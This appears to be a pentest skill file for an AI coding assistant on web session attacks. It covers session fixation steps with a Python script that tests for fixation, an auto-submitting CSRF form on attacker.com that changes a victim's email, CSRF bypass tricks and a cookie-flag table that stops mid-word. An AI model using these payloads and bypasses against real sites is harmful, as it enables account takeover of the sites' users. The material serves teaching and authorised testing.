Install: claude install-skill sunilgentyala/OmniRed
# Session Management Attacks
## Session Fixation
```
1. Attacker obtains a pre-auth session token
2. Attacker sends victim a link with the fixed session: https://target.com/login?PHPSESSID=attacker_session
3. Victim logs in — server assigns that session to the authenticated user
4. Attacker uses the same session token to access victim's account
```
**Test:** Check if the session token changes after successful login. No change = likely fixation vulnerability.
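A script that automates the test above, added here as an example (it is not part of the OmniRed skill): it compares the session cookie the server sets before login with what the login response sets, using constructed Set-Cookie headers, and treats both an unchanged id and a login response that never reissues the cookie as fixation indicators. The cookie name `PHPSESSID` and all header values are assumptions.

```python
# Constructed sample responses as (header, value) pairs; not captured from any real target.
PRE_LOGIN = [("Set-Cookie", "PHPSESSID=fixed123; Path=/")]
LOGIN_ROTATES = [
    ("Set-Cookie", "PHPSESSID=newid456; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Set-Cookie", "lang=en; Path=/"),
]
LOGIN_KEEPS = [("Set-Cookie", "PHPSESSID=fixed123; Path=/")]
LOGIN_SILENT = [("Set-Cookie", "lang=en; Path=/")]  # login never touches the session cookie


def session_values(headers, name):
    """Return every value the response assigns to cookie `name`, in order.

    Only the first `name=value` pair of each Set-Cookie header is the cookie itself;
    everything after the first ';' is attributes (Path, Secure, ...), so it is ignored here.
    """
    values = []
    for field, raw in headers:
        if field.lower() != "set-cookie":
            continue
        pair = raw.split(";", 1)[0]
        if "=" not in pair:
            continue
        cname, value = pair.split("=", 1)
        if cname.strip() == name:
            values.append(value.strip())
    return values


def fixation_verdict(pre_headers, login_headers, name="PHPSESSID"):
    """(vulnerable, reason): vulnerable is True/False, or None when the test does not apply."""
    pre = session_values(pre_headers, name)
    post = session_values(login_headers, name)
    if not pre:
        return None, "no pre-auth session cookie issued; fixation test not applicable"
    if not post:
        # The browser keeps the pre-auth id, which is now bound to the authenticated user.
        return True, "login did not reissue the session cookie; pre-auth id remains valid"
    if post[-1] == pre[-1]:  # browsers apply the last Set-Cookie for a given name
        return True, "session id unchanged after login"
    return False, "session id rotated on login"


if __name__ == "__main__":
    for label, login in (("rotates", LOGIN_ROTATES), ("keeps", LOGIN_KEEPS), ("silent", LOGIN_SILENT)):
        print(label, fixation_verdict(PRE_LOGIN, login))
```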
## CSRF (Cross-Site Request Forgery)
```html
<!-- Auto-submitting CSRF form hosted on attacker.com -->
<form id="csrf" action="https://target.com/api/change-email" method="POST">
  <input name="email" value="attacker@attacker.com">
</form>
<script>document.getElementById('csrf').submit();</script>
```
**CSRF bypass techniques:**
- No CSRF token: attack directly
- CSRF token not tied to the session: reuse your own valid token
- Referer check bypass: send the request from a target.com subdomain (e.g. via an open redirect) or remove the Referer header entirely
- Token in URL: change the request to POST and test whether the GET token is still accepted
- SameSite=Lax: CSRF via a top-level GET navigation that has side effects
## Cookie Security Analysis
```
Secure flag: Missing → token sent over HTTP → interception risk
HttpOnly flag: Missing → token accessible via XSS → document.cookie
SameSite: None → CSRF from cross-origin → test CSRF attacks
Domain: .target.com → token sent to all subdomains → subdomain takeover → session theft
Expiry: No expiry → session persists indefin
```